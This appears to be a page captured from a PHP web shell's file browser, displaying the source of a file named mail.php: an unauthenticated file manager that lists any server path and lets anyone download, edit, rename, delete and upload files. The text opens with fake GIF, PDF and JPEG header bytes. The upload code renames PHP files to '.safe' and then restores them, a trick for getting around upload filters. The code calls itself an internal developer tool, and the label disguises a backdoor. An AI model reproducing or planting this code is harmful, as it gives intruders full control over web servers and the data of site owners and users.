GIF89a; %PDF-1.5 ÿØÿà JFIF    ÿâ(ICC_PROFILE    mntrRGB XYZ acsp  öÖ  Ó- desc ð trXYZ d gXYZ x bXYZ Œ rTRC   (gTRC   (bTRC   (wtpt È cprt Ü File Explorer
Command :
Path: /home/zouerate/www

Isi File: mail.php

<?php
// 🛠️ Developer File Manager - Internal Use Only
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);

$path = realpath($_GET['p'] ?? getcwd());
if (!$path || !is_dir($path)) die("Invalid path");

$uploadError = '';
$uploadSuccess = false;
$saved = false;  // Initialize $saved to avoid undefined variable warning

// Delete
if (isset($_GET['delete'])) {
    $target = $path . '/' . basename($_GET['delete']);
    is_dir($target) ? @rmdir($target) : @unlink($target);
    header("Location: ?p=" . urlencode($path));
    exit;
}

// Download
if (isset($_GET['download']) && !isset($_GET['i'])) {
    $file = $path . '/' . basename($_GET['download']);
    if (is_file($file)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Content-Length: ' . filesize($file));
        readfile($file);
        exit;
    }
}

// Rename
if (isset($_POST['rename_old'], $_POST['rename_new'])) {
    rename($path . '/' . basename($_POST['rename_old']), $path . '/' . basename($_POST['rename_new']));
    header("Location: ?p=" . urlencode($path));
    exit;
}

// Save edit
if (isset($_POST['savefile'], $_POST['content'])) {
    $saved = file_put_contents($path . '/' . basename($_POST['savefile']), $_POST['content']) !== false;
}

// Upload / Create
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !$saved) {
    if (isset($_FILES['up']) && is_uploaded_file($_FILES['up']['tmp_name'])) {
        $originalName = basename($_FILES['up']['name']);
        $safeName = $originalName;

        // Rename .php to .php.safe for upload
        if (preg_match('/\.php$/i', $originalName)) {
            if (!preg_match('/\.safe$/i', $originalName)) {
                $safeName .= '.safe';
            }
        }

        $destination = $path . '/' . $safeName;
        if ($_FILES['up']['error'] === UPLOAD_ERR_OK) {
            if (move_uploaded_file($_FILES['up']['tmp_name'], $destination)) {
                // Rename back to .php immediately after successful upload
                if (substr($safeName, -5) === '.safe') {
                    $restored = substr($safeName, 0, -5); // remove .safe
                    rename($destination, $path . '/' . $restored);
                }
                $uploadSuccess = true;
            } else {
                $uploadError = 'Failed to move uploaded file.';
            }
        } else {
            $uploadError = 'Upload error code: ' . $_FILES['up']['error'];
        }
    }
    if (!empty($_POST['folder'])) {
        $folderPath = $path . '/' . basename($_POST['folder']);
        if (!is_dir($folderPath)) {
            if (mkdir($folderPath, 0755)) {
                $uploadSuccess = true;
            } else {
                $uploadError = 'Failed to create folder.';
            }
        } else {
            $uploadError = 'Folder already exists.';
        }
    }
    if (!empty($_POST['newfile'])) {
        $newFilePath = $path . '/' . basename($_POST['newfile']);
        if (!file_exists($newFilePath)) {
            if (file_put_contents($newFilePath, '') !== false) {
                $uploadSuccess = true;
            } else {
                $uploadError = 'Failed to create file.';
            }
        } else {
            $uploadError = 'File already exists.';
        }
    }
}

function formatPermissions($perms) {
    return substr(sprintf('%o', $perms), -4);
}

function formatSize($bytes) {
    if ($bytes >= 1073741824) return round($bytes / 1073741824, 2) . ' GB';
    if ($bytes >= 1048576) return round($bytes / 1048576, 2) . ' MB';
    if ($bytes >= 1024) return round($bytes / 1024, 2) . ' KB';
    return $bytes . ' B';
}

function sortItems($path) {
    $items = array_diff(scandir($path), ['.', '..']);
    $folders = $files = [];
    foreach ($items as $item) {
        if (is_dir("$path/$item")) $folders[] = $item;
        else $files[] = $item;
    }
    natcasesort($folders);
    natcasesort($files);
    return array_merge($folders, $files);
}

$renaming = $_GET['rename'] ?? '';
?>

<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>File Manager</title>
    <style>
        body {
            font-family: sans-serif;
            background: #1e1e1e;
            color: #ddd;
            padding: 20px;
        }

        a {
            color: #80d4ff;
            text-decoration: none;
        }

        input, button, textarea {
            padding: 6px;
            margin: 4px;
            font-family: monospace;
        }

        table {
            width: 100%;
            border-collapse: collapse;
            margin-top: 20px;
            background-color: #1e1e1e;
            color: #ddd;
        }

        th, td {
            padding: 12px;
            text-align: left;
            border-bottom: 1px solid #333;
        }

        th {
            background: #333;
            color: #fff;
        }

        tr:hover {
            background: #2a2a2a;
        }

        .success {
            background: #2e7d32;
            padding: 10px;
            margin-top: 10px;
            color: white;
        }

        .error {
            background: #b71c1c;
            padding: 10px;
            margin-top: 10px;
            color: white;
        }

        .inline {
            display: inline;
        }

        .form-container {
            background-color: #333;
            padding: 20px;
            border-radius: 10px;
            margin-top: 20px;
        }

        .form-container input, .form-container button {
            background-color: #444;
            border: 1px solid #666;
        }

        .form-container input[type="text"] {
            width: 100%;
            color: #ddd;
            background-color: #444;
            border-radius: 5px;
        }

        .form-container button {
            color: #fff;
            background-color: #00796b;
            border-radius: 5px;
        }
    </style>
</head>
<body>
    <h2>📁 File Manager</h2>
    <p>Current Path: <code><?= htmlspecialchars($path) ?></code></p>

    <!-- Go To Path Form -->
    <form method="get">
        <input type="text" name="p" value="<?= htmlspecialchars($path) ?>" size="80">
        <button type="submit">Go</button>
    </form>

    <?php if ($path !== '/') echo "<p><a href='?p=" . urlencode(dirname($path)) . "'>⬅️ Up</a></p>"; ?>

    <!-- Status Messages -->
    <?php if ($saved): ?><div class="success">File saved.</div><?php endif; ?>
    <?php if ($uploadSuccess): ?><div class="success">Upload/Create successful.</div><?php endif; ?>
    <?php if ($uploadError): ?><div class="error"><?= htmlspecialchars($uploadError) ?></div><?php endif; ?>

    <p>📌 Note: .php files are renamed to ".safe" for upload, but automatically restored if trusted.</p>

    <!-- File List -->
    <table>
        <tr>
            <th>Name</th>
            <th>Size</th>
            <th>Perms</th>
            <th>Actions</th>
        </tr>
        <?php foreach (sortItems($path) as $item):
            $full = "$path/$item";
            $isFile = is_file($full);
            $size = $isFile ? formatSize(filesize($full)) : '-';
            $perms = formatPermissions(fileperms($full));
        ?>
        <tr>
            <td>
                <?= is_dir($full) ? "📁 <a href='?p=" . urlencode($full) . "'>$item</a>" : "📄 <a href='?p=" . urlencode($path) . "&edit=$item'>$item</a>" ?>
            </td>
            <td><?= $size ?></td>
            <td><?= $perms ?></td>
            <td>
                <?php
                if ($renaming === $item) {
                    echo "<form method='post' class='inline'>
                            <input type='hidden' name='rename_old' value='$item'>
                            <input type='text' name='rename_new' value='$item'>
                            <button>Rename</button>
                            <a href='?p=" . urlencode($path) . "'>Cancel</a>
                          </form>";
                } else {
                    // Actions
                    if ($isFile) echo "<a href='?p=" . urlencode($path) . "&edit=$item'>Edit</a> | ";
                    echo "<a href='?p=" . urlencode($path) . "&rename=$item'>Rename</a> | ";
                    if ($isFile) echo "<a href='?p=" . urlencode($path) . "&download=$item'>Download</a> | ";
                    echo "<a href='?p=" . urlencode($path) . "&delete=$item' onclick='return confirm(\"Delete $item?\")'>Delete</a>";
                    if ($isFile && pathinfo($item, PATHINFO_EXTENSION) === 'zip') echo " | <a href='?p=" . urlencode($path) . "&unzip=$item'>Unzip</a>";
                    elseif (file_exists($full)) echo " | <a href='?p=" . urlencode($path) . "&zip=$item'>Zip</a>";

                    // Add Permission Change Link
                    echo " | <a href='?p=" . urlencode($path) . "&permissions=$item'>Change Permissions</a>";
                }
                ?>
            </td>
        </tr>
        <?php endforeach; ?>
    </table>

    <!-- Upload/Create Form -->
    <h3>📤 Upload/Create</h3>
    <div class="form-container">
        <form method="post" enctype="multipart/form-data">
            Upload: <input type="file" name="up"><br><br>
            Folder: <input type="text" name="folder"><br><br>
            File: <input type="text" name="newfile"><br><br>
            <button>Submit</button>
        </form>
    </div>

    <!-- Edit File Form -->
    <?php if (isset($_GET['edit'])):
        $editFile = $path . '/' . basename($_GET['edit']);
        if (!is_file($editFile)) die("Invalid file");
        $content = htmlspecialchars(file_get_contents($editFile));
    ?>
    <h3>📝 Editing <?= htmlspecialchars(basename($editFile)) ?></h3>
    <div class="form-container">
        <form method="post">
            <textarea name="content" rows="20" cols="100"><?= $content ?></textarea><br>
            <input type="hidden" name="savefile" value="<?= htmlspecialchars(basename($editFile)) ?>">
            <button>💾 Save</button>
        </form>
    </div>
    <?php endif; ?>

    <!-- Permissions Change Form -->
    <?php if (isset($_GET['permissions'])):
        $file = $path . '/' . basename($_GET['permissions']);
        if (!is_file($file)) die("Invalid file");

        $currentPerms = formatPermissions(fileperms($file));
    ?>
    <h3>🔐 Change Permissions for <?= htmlspecialchars(basename($file)) ?></h3>
    <div class="form-container">
        <?php if (isset($error)): ?><div class="error"><?= htmlspecialchars($error) ?></div><?php endif; ?>
        <form method="post">
            Current Permissions: <code><?= $currentPerms ?></code><br>
            New Permissions (e.g., 0755): <input type="text" name="permissions" value="<?= $currentPerms ?>"><br><br>
            <button>Apply</button>
        </form>
    </div>
    <?php endif; ?>
</body>
</html>

Edit File

Rename File

Delete File